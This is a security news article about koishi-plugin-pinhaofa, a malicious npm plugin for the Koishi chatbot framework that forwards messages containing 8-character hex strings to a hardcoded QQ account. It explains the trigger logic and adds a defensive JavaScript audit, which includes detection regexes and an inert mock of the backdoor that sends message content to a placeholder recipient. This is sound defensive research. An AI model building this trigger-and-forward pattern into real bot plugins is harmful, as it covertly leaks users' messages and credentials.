
Socket’s Threat Research Team has uncovered a dangerous new threat lurking in the npm ecosystem: a malicious Koishi plugin masquerading as a helpful spelling autocorrect tool. Dubbed koishi-plugin-pinhaofa, the package installs a covert data exfiltration backdoor into chatbots built with the Koishi framework, silently leaking sensitive user messages to a hardcoded Tencent QQ account.
Koishi is a versatile TypeScript chatbot framework that supports popular platforms like QQ, Telegram, and Discord, enabling developers to build bots that share a single codebase. With over 1,000 community plugins available, Koishi has seen rapid adoption—making it a ripe target for malicious actors.
The malicious plugin takes advantage of how Koishi plugins are executed inside the bot’s runtime, granting them unrestricted access to read or modify every message.
At the core of the attack is a cleverly simple trigger: the plugin scans all incoming messages for 8-character hexadecimal strings, such as:
- Git commit hashes
- Truncated JWT or API tokens
- CRC-32 checksums
- Device serial numbers
When a match is found, the full message—including any embedded secrets or credentials—is forwarded to QQ user ID 1821181277. The message might include:
- Banking transaction hashes or card digits
- E-commerce order links with session tokens
- Healthcare identifiers or appointment codes
“The narrow trigger pulls in these high value artifacts while generating few false positives, keeping the threat actor’s inbox relevant and manageable,” Socket notes.
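As an added example (not code from Socket’s report or from the plugin itself), the following defender-side audit replays constructed chat lines through the same 8-hex-character trigger described above, so an operator can estimate which past messages a compromised plugin would have forwarded, and statically flags plugin source that combines that matcher with a private-message send to a hardcoded recipient. The method name `sendPrivateMessage` is assumed to be the Koishi Bot API; the sample messages and sample sources are constructed.

```javascript
// Added example, not Socket's or the plugin's code. Two defender-side checks for
// a Koishi deployment: (1) replay chat history through the reported trigger to
// measure exposure, (2) a static heuristic over plugin source for the reported
// backdoor shape. The method name sendPrivateMessage is assumed to be the Koishi
// Bot API; adjust the pattern if your version names it differently.

// Case-insensitive, word-bounded 8-char hex run: commit hashes, CRC-32s, short tokens.
const HEX8 = /\b[0-9a-f]{8}\b/gi;

// Tokens in `text` that would trip the trigger; [] means the message would not be forwarded.
function hexTriggerMatches(text) {
  return text.match(HEX8) || [];
}

// Constructed sample traffic (not real user data).
const SAMPLE_MESSAGES = [
  "deploying commit 3fa9c2e1 to staging now",
  "order 7b1d0e44 shipped, tracking link below",
  "lunch at noon?",
  "checksum mismatch: expected deadbeef",
];

// Which sample messages (and which tokens) the trigger would have captured.
function exposureReport(messages = SAMPLE_MESSAGES) {
  return messages
    .map((m) => ({ message: m, tokens: hexTriggerMatches(m) }))
    .filter((r) => r.tokens.length > 0);
}

// Heuristic markers. A recipient taken from the session (session.userId) is normal;
// a literal numeric ID that never changes is the tell described in the report.
const LITERAL_RECIPIENT = /sendPrivateMessage\(\s*['"`]\d{5,}['"`]\s*,/;
const HEX8_MATCHER = /\[0-9a-f(?:A-F)?\]\{8\}/;

function auditPluginSource(src) {
  const findings = [];
  if (LITERAL_RECIPIENT.test(src)) findings.push("literal numeric recipient in sendPrivateMessage");
  if (HEX8_MATCHER.test(src)) findings.push("8-char hex matcher on message content");
  // Both markers together match the reported pattern; either alone is common in benign plugins.
  return { suspicious: findings.length === 2, findings };
}

// Constructed sources: a benign reply-to-sender plugin and an inert mock of the reported shape
// (placeholder recipient ID, not the one from the report).
const BENIGN_SRC = "if (/^!ping/.test(session.content)) session.bot.sendPrivateMessage(session.userId, 'pong')";
const MOCK_BACKDOOR_SRC = "if (/[0-9a-f]{8}/i.test(session.content)) bot.sendPrivateMessage('0000000000', session.content)";
```

Running `exposureReport()` over the constructed sample returns three of the four messages; only "lunch at noon?" would have stayed private.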
The package was published on npm by a user with the alias kuminfennel, using the QQ-linked email 1821181277@qq.com and a matching GitHub account. Despite the malicious intent, the package remains publicly available on both npm and GitHub at the time of writing.
“The threat actor succeeds by exploiting three conditions: Koishi loads every plugin directly inside the bot process, npm provides wide and convenient distribution, and developers often install helper plugins without rigorous review,” Socket explains.
Once installed, koishi-plugin-pinhaofa:
- Exfiltrates sensitive user data in real time
- Blends into normal chatbot traffic
- Can cause major GDPR, HIPAA, or PCI-DSS compliance violations